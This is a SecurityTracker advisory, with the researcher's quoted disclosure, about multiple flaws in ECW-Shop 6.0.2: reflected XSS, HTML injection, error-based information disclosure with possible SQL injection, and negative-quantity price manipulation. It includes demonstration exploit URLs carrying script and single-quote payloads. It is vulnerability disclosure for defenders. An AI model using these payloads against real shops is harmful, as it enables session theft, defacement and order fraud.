SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   ECW-Shop Vendors:   ECW-Shop
ECW-Shop Bugs Permit SQL Injection, Cross-Site Scripting, and Price Modification
SecurityTracker Alert ID:  1014734
SecurityTracker URL:  http://securitytracker.com/id/1014734
CVE Reference:   CVE-2005-2621, CVE-2005-2622, CVE-2005-2623   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 19 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.0.2
Description:   Several vulnerabilities were reported in ECW-Shop. A remote user can modify the shopping cart total price. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary HTML to be executed by the target user's browser. The code will originate from the site running the ECW-Shop software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'max' and 'ctg' parameters are affected.

Some demonstration exploit URLs are provided:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>

http://[target]/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

A remote user can supply the following URLs to cause the system to disclose system information in an error message:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='

It may be possible to inject SQL commands, but the report did not confirm SQL injection.

A remote user can add a negative quantity of an item to the shopping cart to cause the total price of the cart contents to be reduced by the appropriate amount.

The vendor was notified on June 8, 2005.

John Cobb discovered these vulnerabilities.

Impact:   A remote user can modify the shopping cart total price.

A remote user may be able to inject SQL commands.

A remote user can also conduct cross-site scripting attacks.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.soft4e.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities

Hello All,

I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2

Authors Site: http://www.soft4e.com/

ECW Shop is described by its authors as:

ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script
>

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+

HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma
x=1

[4]------------------------------------------------------------+

Cart/Order Manipulation:

You can add negative quanity value items to your cart to gain credit.

Example:



+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE


JohnC@NoBytes.com

http://www.NoBytes.com




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC